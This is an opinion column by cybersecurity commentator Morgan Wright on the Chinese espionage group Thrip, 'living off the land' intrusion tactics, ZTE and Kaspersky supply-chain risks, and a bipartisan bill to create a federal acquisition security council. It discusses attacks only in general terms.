What’s been more beneficial for the U.S. economy? President Trump and his economic policies — or China and Russia? At least for the cybersecurity sector, many firms should be thanking our adversaries for a growing business.
Several cybersecurity startups are making tremendous gains in this field, despite some setbacks in IPOs (Initial Public Offerings) and investor anxiety. The recent announcement by CrowdStrike shows the seriousness of digital warfare: The latest Silicon Valley unicorn (startups with a valuation over $1 billion) just raised $200 million to achieve a $3 billion valuation. That’s a whole lot of zeros for a business that’s about ones and zeros.
Combined with two other rising superstars, Tanium and Tenable, billions of dollars are in play to defend and protect our growing reliance on connecting everything to the internet. Even Symantec, which recently was hit hard by an audit investigation, is still a force to be reckoned with. Especially with the latest discovery of yet another threat-actor with a very insidious approach.
“Thrip” is the name given to a group most likely operating out of China. Symantec’s analysis identified three computers in China being used to launch these new attacks against “communications, geospatial imaging, and defense sectors, both in the United States and Southeast Asia.”
One of the most troubling aspects of this campaign was the targeting of a satellite communications operator. As a country, we have a tremendous reliance on satellites, from communications, transportation and television to navigation. So does our military. The need for accurate GPS information extends to the delivery of supplies and personnel, as well as weapons. If our main adversaries can’t hack or jam the satellites, they can resort to blowing them out of orbit.
Another troubling development in the methods of attack involve turning the targets’ own tools against them — or, in military parlance, “living off the land.” (During the Civil War, Gen. Ulysses Grant moved 40,000 troops to a point 30 miles south of Vicksburg in order to capture the last remaining stronghold on the Mississippi River; this meant abandoning his supply lines and forcing his troops to live off the land and the enemy’s own resources.)
In the case of Thrip and the espionage campaign, many of the tools used to conduct alleged intrusions already existed on the targeted systems. This makes the use of AI (artificial intelligence) to detect hidden attacks very important. Winning the AI and robotics war against China (as I discussed here) is more important than ever, if the United States is to maintain dominance in cyberspace.
This current campaign, while bearing all the hallmarks of espionage, also has the capacity to disrupt operational systems as well. During a time of conflict, as in the South China Sea, disrupting satellites and communications would make us deaf and blind to a significant extent.
Besides “living off the land,” another dangerous tactic is “hiding in plain sight,” as in the case of ZTE and Kaspersky Labs.
ZTE, the Chinese telecommunications giant, still hasn’t made it back from the financial brink after receiving an economic death penalty, even though President Trump is helping it to find a way out. One of the biggest concerns within the U.S. intelligence community was that ZTE could spy on our government and consumers by hiding malicious software and hardware inside its phones.
Russia’s Kasperksy Labs also received a “red card” (in recognition of the mania being exhibited for the 2018 FIFA World Cup). It was banned from the computer systems of the federal government, including the Department of Defense. Its main lab is in Moscow, and it helped the FSB — the successor to the Soviet-era KGB — to discover a treasure trove of NSA hacking tools on a contractor’s laptop that was running its software.
While it may be nearly impossible to stop the “living off the land” strategy, Congress has finally decided that it ought to do something about the “hiding in plain sight” threat. In a rare bipartisan move, a bill was introduced on June 19 to create a council that would have responsibility for evaluating supply-chain risks that could impact national security.
The Federal Acquisition Supply Chain Security Act (FASCSA) was a direct response to the concerns over ZTE and Kaspersky. This bill also has the other goal of keeping the ban against ZTE in place and not allowing President Trump to cut a deal with China. If this bill survives, it will do what should have been done a long time ago — that is, directly involving members of the intelligence community and consulting with the private sector.
The Federal Acquisition Security Council would be comprised of the Office of Management and Budget (OMB), the General Services Administration (GSA), the Department of Homeland Security (DHS), the Office of the Director of National Intelligence (ODNI), the Federal Bureau of Investigation (FBI) the Department of Defense (DOD) and the National Institute of Standards and Technology (NIST).
According to the press release:
“For years, the Intelligence Community was aware of the risk that Kaspersky Labs antivirus products posed to national security, but that information was not widely shared with other government agencies. The bill raises awareness across the government by breaking down silos between national security and civilian agencies and requires them to develop a strategy together that confronts supply chain risk management in government purchasing of IT.”
Finally — geeks, spooks, g-men and policy wonks, all working together. Maybe there really is a Santa Claus.
Morgan Wright is an expert on cybersecurity strategy, cyberterrorism, identity theft and privacy. Previously Morgan was a senior advisor in the U.S. State Department Antiterrorism Assistance Program and senior law enforcement advisor for the 2012 Republican National Convention. Follow him on Twitter @morganwright_us.